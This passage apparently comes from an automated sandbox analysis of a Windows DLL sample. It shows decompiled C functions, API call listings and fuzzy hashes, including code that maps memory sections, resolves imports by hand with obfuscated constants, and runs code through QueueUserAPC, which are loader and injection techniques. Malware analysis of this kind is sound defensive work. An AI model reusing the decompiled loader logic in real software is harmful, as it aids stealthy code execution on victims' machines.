                                                                                                            				} while (_t28 == 9);
                                                                                                            				if(_t28 != 0) {
                                                                                                            					L25:
                                                                                                            					return _t28;
                                                                                                            				}
                                                                                                            				if(_a4 != 0) {
                                                                                                            					L18:
                                                                                                            					_push(0);
                                                                                                            					_t67 = E6F03153C(E6F0310B9,  &_v36);
                                                                                                            					if(_t67 == 0) {
                                                                                                            						_v8 = GetLastError();
                                                                                                            					} else {
                                                                                                            						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                                                                                            						_v8 = _t32;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							GetExitCodeThread(_t67,  &_v8);
                                                                                                            						}
                                                                                                            						CloseHandle(_t67);
                                                                                                            					}
                                                                                                            					_t28 = _v8;
                                                                                                            					if(_t28 == 0xffffffff) {
                                                                                                            						_t28 = GetLastError();
                                                                                                            					}
                                                                                                            					goto L25;
                                                                                                            				}
                                                                                                            				if(E6F031AD7(_t53,  &_a4) != 0) {
                                                                                                            					 *0x6f0341b8 = 0;
                                                                                                            					goto L18;
                                                                                                            				}
                                                                                                            				_t52 = _a4;
                                                                                                            				_t68 = __imp__GetLongPathNameW;
                                                                                                            				_t38 =  *_t68(_t52, 0, 0); // executed
                                                                                                            				_t60 = _t38;
                                                                                                            				if(_t60 == 0) {
                                                                                                            					L16:
                                                                                                            					 *0x6f0341b8 = _t52;
                                                                                                            					goto L18;
                                                                                                            				}
                                                                                                            				_t19 = _t60 + 2; // 0x2
                                                                                                            				_t40 = E6F031000(_t60 + _t19);
                                                                                                            				 *0x6f0341b8 = _t40;
                                                                                                            				if(_t40 == 0) {
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            				 *_t68(_t52, _t40, _t60); // executed
                                                                                                            				E6F031397(_t52);
                                                                                                            				goto L18;
                                                                                                            			}

























                                                                                                            APIs
                                                                                                              • Part of subcall function 6F031825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F0315D1), ref: 6F031834
                                                                                                              • Part of subcall function 6F031825: GetVersion.KERNEL32 ref: 6F031843
                                                                                                              • Part of subcall function 6F031825: GetCurrentProcessId.KERNEL32 ref: 6F03185F
                                                                                                              • Part of subcall function 6F031825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F031878
                                                                                                              • Part of subcall function 6F031000: HeapAlloc.KERNEL32(00000000,?,6F0315ED,00000030,747863F0,00000000), ref: 6F03100C
                                                                                                            • NtQuerySystemInformation.NTDLL ref: 6F0315FB
                                                                                                            • Sleep.KERNELBASE(00000000,00000000,00000030,747863F0,00000000), ref: 6F031642
                                                                                                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6F031678
                                                                                                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6F031696
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,6F0310B9,?,00000000), ref: 6F0316CD
                                                                                                            • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6F0316DF
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6F0316E6
                                                                                                            • GetLastError.KERNEL32(6F0310B9,?,00000000), ref: 6F0316EE
                                                                                                            • GetLastError.KERNEL32 ref: 6F0316FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 3479304935-1084903527
                                                                                                            • Opcode ID: b2966e8e2b396e6b670b33018f7e70d08f927b832dc32bba056cded9a4e2eb32
                                                                                                            • Instruction ID: 1b2c2d97c6c7655deb36835c92069fe809997784507030ea1a40c92b85798bef
                                                                                                            • Opcode Fuzzy Hash: b2966e8e2b396e6b670b33018f7e70d08f927b832dc32bba056cded9a4e2eb32
                                                                                                            • Instruction Fuzzy Hash: E2319177D01A37BADB219BE48D94B9E7ABCEF4E764F140122E500E7140DB34EA419BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6F045696
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DB7A0,000008BB), ref: 6F04576F
                                                                                                              • Part of subcall function 6F0472B0: task.LIBCPMTD ref: 6F047352
                                                                                                              • Part of subcall function 6F04BA20: swap.LIBCPMTD ref: 6F04BA39
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6F0C7144,?,?,?,?,?,00000000), ref: 6F045950
                                                                                                            • std::locale::locale.LIBCPMTD ref: 6F0459D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 756721536-1684325040
                                                                                                            • Opcode ID: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction ID: 2f6f9adb6c59c61e1ddf97a80f01413311ca98bf2b66b52aad743d6f9d658509
                                                                                                            • Opcode Fuzzy Hash: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction Fuzzy Hash: A8522FB1D00616CFCB08DF69DD90BA9BBB2FB4A314F208129D90597396D7385859EF48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E6F0313B8(intOrPtr* __eax, void** _a4) {
                                                                                                            				int _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				void* _v24;
                                                                                                            				int _v28;
                                                                                                            				int _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				int _v40;
                                                                                                            				int _v44;
                                                                                                            				void* _v48;
                                                                                                            				void* __esi;
                                                                                                            				long _t34;
                                                                                                            				void* _t39;
                                                                                                            				void* _t47;
                                                                                                            				intOrPtr* _t48;
                                                                                                            
                                                                                                            				_t48 = __eax;
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                            				_v16 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_v48 = 0x18;
                                                                                                            				_v44 = 0;
                                                                                                            				_v36 = 0x40;
                                                                                                            				_v40 = 0;
                                                                                                            				_v32 = 0;
                                                                                                            				_v28 = 0;
                                                                                                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                            				if(_t34 < 0) {
                                                                                                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                            				} else {
                                                                                                            					 *_t48 = _v16;
                                                                                                            					_t39 = E6F031273(_t48,  &_v12); // executed
                                                                                                            					_t47 = _t39;
                                                                                                            					if(_t47 != 0) {
                                                                                                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                            					} else {
                                                                                                            						memset(_v12, 0, _v24);
                                                                                                            						 *_a4 = _v12;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t47;
                                                                                                            			}


















                                                                                                            APIs
                                                                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 6F031415
                                                                                                              • Part of subcall function 6F031273: NtMapViewOfSection.NTDLL(00000000,000000FF,6F03142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6F03142A,?), ref: 6F0312A0
                                                                                                            • memset.NTDLL ref: 6F031437
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Section$CreateViewmemset
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2533685722-2766056989
                                                                                                            • Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                            • Instruction ID: b86e538307bcd560f8699abeebeeeff8bc10f221715366fc96e5c7b5b8a59cfc
                                                                                                            • Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                            • Instruction Fuzzy Hash: D9211DB6D00219AFDB01CFA9C884ADEFBF9FF48354F508529E655F7210D734AA448BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F031DE5(void* __edi, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr* _v12;
                                                                                                            				_Unknown_base(*)()** _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed short _v24;
                                                                                                            				struct HINSTANCE__* _v28;
                                                                                                            				intOrPtr _t43;
                                                                                                            				intOrPtr* _t45;
                                                                                                            				intOrPtr _t46;
                                                                                                            				struct HINSTANCE__* _t47;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				intOrPtr _t50;
                                                                                                            				signed short _t51;
                                                                                                            				_Unknown_base(*)()* _t53;
                                                                                                            				CHAR* _t54;
                                                                                                            				_Unknown_base(*)()* _t55;
                                                                                                            				void* _t58;
                                                                                                            				signed int _t59;
                                                                                                            				_Unknown_base(*)()* _t60;
                                                                                                            				intOrPtr _t61;
                                                                                                            				intOrPtr _t65;
                                                                                                            				signed int _t68;
                                                                                                            				void* _t69;
                                                                                                            				CHAR* _t71;
                                                                                                            				signed short* _t73;
                                                                                                            
                                                                                                            				_t69 = __edi;
                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                            				_t59 =  *0x6f0341c0;
                                                                                                            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                                                            				if(_t43 != 0) {
                                                                                                            					_t45 = _t43 + __edi;
                                                                                                            					_v12 = _t45;
                                                                                                            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                            					if(_t46 != 0) {
                                                                                                            						while(1) {
                                                                                                            							_t71 = _t46 + _t69;
                                                                                                            							_t47 = LoadLibraryA(_t71); // executed
                                                                                                            							_v28 = _t47;
                                                                                                            							if(_t47 == 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_v24 = _v24 & 0x00000000;
                                                                                                            							 *_t71 = _t59 - 0x69b25f44;
                                                                                                            							_t49 = _v12;
                                                                                                            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                            							_t50 =  *_t49;
                                                                                                            							if(_t50 != 0) {
                                                                                                            								L6:
                                                                                                            								_t73 = _t50 + _t69;
                                                                                                            								_v16 = _t61 + _t69;
                                                                                                            								while(1) {
                                                                                                            									_t51 =  *_t73;
                                                                                                            									if(_t51 == 0) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									if(__eflags < 0) {
                                                                                                            										__eflags = _t51 - _t69;
                                                                                                            										if(_t51 < _t69) {
                                                                                                            											L12:
                                                                                                            											_t21 =  &_v8;
                                                                                                            											 *_t21 = _v8 & 0x00000000;
                                                                                                            											__eflags =  *_t21;
                                                                                                            											_v24 =  *_t73 & 0x0000ffff;
                                                                                                            										} else {
                                                                                                            											_t65 = _a4;
                                                                                                            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                            												goto L12;
                                                                                                            											} else {
                                                                                                            												goto L11;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t51 = _t51 + _t69;
                                                                                                            										L11:
                                                                                                            										_v8 = _t51;
                                                                                                            									}
                                                                                                            									_t53 = _v8;
                                                                                                            									__eflags = _t53;
                                                                                                            									if(_t53 == 0) {
                                                                                                            										_t54 = _v24 & 0x0000ffff;
                                                                                                            									} else {
                                                                                                            										_t54 = _t53 + 2;
                                                                                                            									}
                                                                                                            									_t55 = GetProcAddress(_v28, _t54);
                                                                                                            									__eflags = _t55;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_v20 = _t59 - 0x69b25ec5;
                                                                                                            									} else {
                                                                                                            										_t68 = _v8;
                                                                                                            										__eflags = _t68;
                                                                                                            										if(_t68 != 0) {
                                                                                                            											 *_t68 = _t59 - 0x69b25f44;
                                                                                                            										}
                                                                                                            										 *_v16 = _t55;
                                                                                                            										_t58 = 0x593682f4 + _t59 * 4;
                                                                                                            										_t73 = _t73 + _t58;
                                                                                                            										_t32 =  &_v16;
                                                                                                            										 *_t32 = _v16 + _t58;
                                                                                                            										__eflags =  *_t32;
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									goto L23;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t50 = _t61;
                                                                                                            								if(_t61 != 0) {
                                                                                                            									goto L6;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L23:
                                                                                                            							_v12 = _v12 + 0x14;
                                                                                                            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                            							if(_t46 != 0) {
                                                                                                            								continue;
                                                                                                            							} else {
                                                                                                            							}
                                                                                                            							L26:
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            						_t60 = _t59 + 0x964da13a;
                                                                                                            						__eflags = _t60;
                                                                                                            						_v20 = _t60;
                                                                                                            						goto L26;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L27:
                                                                                                            				return _v20;
                                                                                                            			}




























                                                                                                            0x6f031e7b
                                                                                                            0x6f031e7e
                                                                                                            0x6f031e80
                                                                                                            0x6f031e87
                                                                                                            0x6f031e82
                                                                                                            0x6f031e82
                                                                                                            0x6f031e82
                                                                                                            0x6f031e8f
                                                                                                            0x6f031e95
                                                                                                            0x6f031e97
                                                                                                            0x6f031ec7
                                                                                                            0x6f031e99
                                                                                                            0x6f031e99
                                                                                                            0x6f031e9c
                                                                                                            0x6f031e9e
                                                                                                            0x6f031ea6
                                                                                                            0x6f031ea6
                                                                                                            0x6f031eab
                                                                                                            0x6f031ead
                                                                                                            0x6f031eb4
                                                                                                            0x6f031eb6
                                                                                                            0x6f031eb6
                                                                                                            0x6f031eb6
                                                                                                            0x00000000
                                                                                                            0x6f031eb6
                                                                                                            0x00000000
                                                                                                            0x6f031e97
                                                                                                            0x6f031e46
                                                                                                            0x6f031e46
                                                                                                            0x6f031e4a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031e4a
                                                                                                            0x6f031eca
                                                                                                            0x6f031eca
                                                                                                            0x6f031ed1
                                                                                                            0x6f031ed6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031edc
                                                                                                            0x6f031ee7
                                                                                                            0x00000000
                                                                                                            0x6f031ee7
                                                                                                            0x6f031ede
                                                                                                            0x6f031ede
                                                                                                            0x6f031ee4
                                                                                                            0x00000000
                                                                                                            0x6f031ee4
                                                                                                            0x6f031e12
                                                                                                            0x6f031ee8
                                                                                                            0x6f031eed

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6F031E1D
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 6F031E8F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2574300362-0
                                                                                                            • Opcode ID: cf72615dc753a5f6fa84336d7d4741fb62cec8a52b43e06e745c7156286fbbae
                                                                                                            • Instruction ID: 6e5e13d13c0df0ccbd1b18a019aca08e28ee2344b26178da9f5ffc09f7668914
                                                                                                            • Opcode Fuzzy Hash: cf72615dc753a5f6fa84336d7d4741fb62cec8a52b43e06e745c7156286fbbae
                                                                                                            • Instruction Fuzzy Hash: B3312A76E00227DFDB14CF99C890BADB7F6BF09314B10416AD811EB240E736EA40CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E6F031273(void** __esi, PVOID* _a4) {
                                                                                                            				long _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				long _t13;
                                                                                                            
                                                                                                            				_v16 = 0;
                                                                                                            				asm("stosd");
                                                                                                            				_v8 = 0;
                                                                                                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                            				if(_t13 < 0) {
                                                                                                            					_push(_t13);
                                                                                                            					return __esi[6]();
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,6F03142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6F03142A,?), ref: 6F0312A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: SectionView
                                                                                                            • String ID:
                                                                                                            • API String ID: 1323581903-0
                                                                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                            • Instruction ID: a14eebcffd2d8948593396a6fee9fe69d63e93d4d82821a7c407591dcc4f052c
                                                                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                            • Instruction Fuzzy Hash: 66F012B6D0020DBFEB119FA5CC85D9FBBBDEF48354B104A39B152E1090D6309E588A60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                            				long _v8;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				char _t9;
                                                                                                            				void* _t10;
                                                                                                            				void* _t18;
                                                                                                            				void* _t23;
                                                                                                            				void* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t9 = _a8;
                                                                                                            				_v8 = 1;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					_t10 = InterlockedDecrement(0x6f034188);
                                                                                                            					__eflags = _t10;
                                                                                                            					if(_t10 == 0) {
                                                                                                            						__eflags =  *0x6f03418c;
                                                                                                            						if( *0x6f03418c != 0) {
                                                                                                            							_t36 = 0x2328;
                                                                                                            							while(1) {
                                                                                                            								SleepEx(0x64, 1);
                                                                                                            								__eflags =  *0x6f034198;
                                                                                                            								if( *0x6f034198 == 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t36 = _t36 - 0x64;
                                                                                                            								__eflags = _t36;
                                                                                                            								if(_t36 > 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							CloseHandle( *0x6f03418c);
                                                                                                            						}
                                                                                                            						HeapDestroy( *0x6f034190);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_t9 == 1 && InterlockedIncrement(0x6f034188) == 1) {
                                                                                                            						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                            						 *0x6f034190 = _t18;
                                                                                                            						_t41 = _t18;
                                                                                                            						if(_t18 == 0) {
                                                                                                            							L6:
                                                                                                            							_v8 = 0;
                                                                                                            						} else {
                                                                                                            							 *0x6f0341b0 = _a4;
                                                                                                            							asm("lock xadd [eax], edi");
                                                                                                            							_push( &_a8);
                                                                                                            							_t23 = E6F03153C(E6F031719, E6F031C35(_a12, 1, 0x6f034198, _t41));
                                                                                                            							 *0x6f03418c = _t23;
                                                                                                            							if(_t23 == 0) {
                                                                                                            								asm("lock xadd [esi], eax");
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _v8;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(6F034188), ref: 6F031B7B
                                                                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6F031B90
                                                                                                              • Part of subcall function 6F03153C: CreateThread.KERNELBASE ref: 6F031553
                                                                                                              • Part of subcall function 6F03153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F031568
                                                                                                              • Part of subcall function 6F03153C: GetLastError.KERNEL32(00000000), ref: 6F031573
                                                                                                              • Part of subcall function 6F03153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6F03157D
                                                                                                              • Part of subcall function 6F03153C: CloseHandle.KERNEL32(00000000), ref: 6F031584
                                                                                                              • Part of subcall function 6F03153C: SetLastError.KERNEL32(00000000), ref: 6F03158D
                                                                                                            • InterlockedDecrement.KERNEL32(6F034188), ref: 6F031BE3
                                                                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 6F031BFD
                                                                                                            • CloseHandle.KERNEL32 ref: 6F031C19
                                                                                                            • HeapDestroy.KERNEL32 ref: 6F031C25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                            • String ID: Txt
                                                                                                            • API String ID: 2110400756-4033135041
                                                                                                            • Opcode ID: 0ebac1ae4dfe5c157954ff6f747a6ff9612342e97f7f78a0dbbdf803900d8b84
                                                                                                            • Instruction ID: b071c0e274c10d1cd8487cd0386fcc6268ff14783634fd52fc8dc25bf293fe1b
                                                                                                            • Opcode Fuzzy Hash: 0ebac1ae4dfe5c157954ff6f747a6ff9612342e97f7f78a0dbbdf803900d8b84
                                                                                                            • Instruction Fuzzy Hash: 8E21AE3BE10A27FBCF20AFA9CC84B497BF8FB5E2747500826E506DB140E3359811AB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F03153C(long _a4, DWORD* _a12) {
                                                                                                            				_Unknown_base(*)()* _v0;
                                                                                                            				void* _t4;
                                                                                                            				long _t6;
                                                                                                            				long _t11;
                                                                                                            				void* _t13;
                                                                                                            
                                                                                                            				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6f0341c0, 0, _a12); // executed
                                                                                                            				_t13 = _t4;
                                                                                                            				if(_t13 != 0) {
                                                                                                            					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                            					if(_t6 == 0) {
                                                                                                            						_t11 = GetLastError();
                                                                                                            						TerminateThread(_t13, _t11);
                                                                                                            						CloseHandle(_t13);
                                                                                                            						_t13 = 0;
                                                                                                            						SetLastError(_t11);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t13;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • CreateThread.KERNELBASE ref: 6F031553
                                                                                                            • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F031568
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 6F031573
                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 6F03157D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6F031584
                                                                                                            • SetLastError.KERNEL32(00000000), ref: 6F03158D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 3832013932-1084903527
                                                                                                            • Opcode ID: c33f5a5c0a65e329fe4803572d26b687d4372741a62974b78e40391c498aaa88
                                                                                                            • Instruction ID: ad48bd9f519df07a0fdf1cdde04f665d30b2f92de2129def7019ff0cc4164034
                                                                                                            • Opcode Fuzzy Hash: c33f5a5c0a65e329fe4803572d26b687d4372741a62974b78e40391c498aaa88
                                                                                                            • Instruction Fuzzy Hash: EFF01237605E22FBDB315BA09D9AF9BBFA9FF0E772F000504F60595150C7259820AB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F0319C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                            				_Unknown_base(*)()* _t33;
                                                                                                            				_Unknown_base(*)()* _t36;
                                                                                                            				_Unknown_base(*)()* _t39;
                                                                                                            				_Unknown_base(*)()* _t42;
                                                                                                            				intOrPtr _t46;
                                                                                                            				struct HINSTANCE__* _t50;
                                                                                                            				intOrPtr _t56;
                                                                                                            
                                                                                                            				_t56 = E6F031000(0x20);
                                                                                                            				if(_t56 == 0) {
                                                                                                            					_v8 = 8;
                                                                                                            				} else {
                                                                                                            					_t50 = GetModuleHandleA( *0x6f0341c4 + 0x6f035014);
                                                                                                            					_v8 = 0x7f;
                                                                                                            					_t29 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035151);
                                                                                                            					 *(_t56 + 0xc) = _t29;
                                                                                                            					if(_t29 == 0) {
                                                                                                            						L8:
                                                                                                            						E6F031397(_t56);
                                                                                                            					} else {
                                                                                                            						_t33 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035161);
                                                                                                            						 *(_t56 + 0x10) = _t33;
                                                                                                            						if(_t33 == 0) {
                                                                                                            							goto L8;
                                                                                                            						} else {
                                                                                                            							_t36 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035174);
                                                                                                            							 *(_t56 + 0x14) = _t36;
                                                                                                            							if(_t36 == 0) {
                                                                                                            								goto L8;
                                                                                                            							} else {
                                                                                                            								_t39 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035189);
                                                                                                            								 *(_t56 + 0x18) = _t39;
                                                                                                            								if(_t39 == 0) {
                                                                                                            									goto L8;
                                                                                                            								} else {
                                                                                                            									_t42 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f03519f);
                                                                                                            									 *(_t56 + 0x1c) = _t42;
                                                                                                            									if(_t42 == 0) {
                                                                                                            										goto L8;
                                                                                                            									} else {
                                                                                                            										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                            										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                            										_t46 = E6F0313B8(_t56, _a12); // executed
                                                                                                            										_v8 = _t46;
                                                                                                            										if(_t46 != 0) {
                                                                                                            											goto L8;
                                                                                                            										} else {
                                                                                                            											 *_a16 = _t56;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _v8;
                                                                                                            			}













                                                                                                            APIs
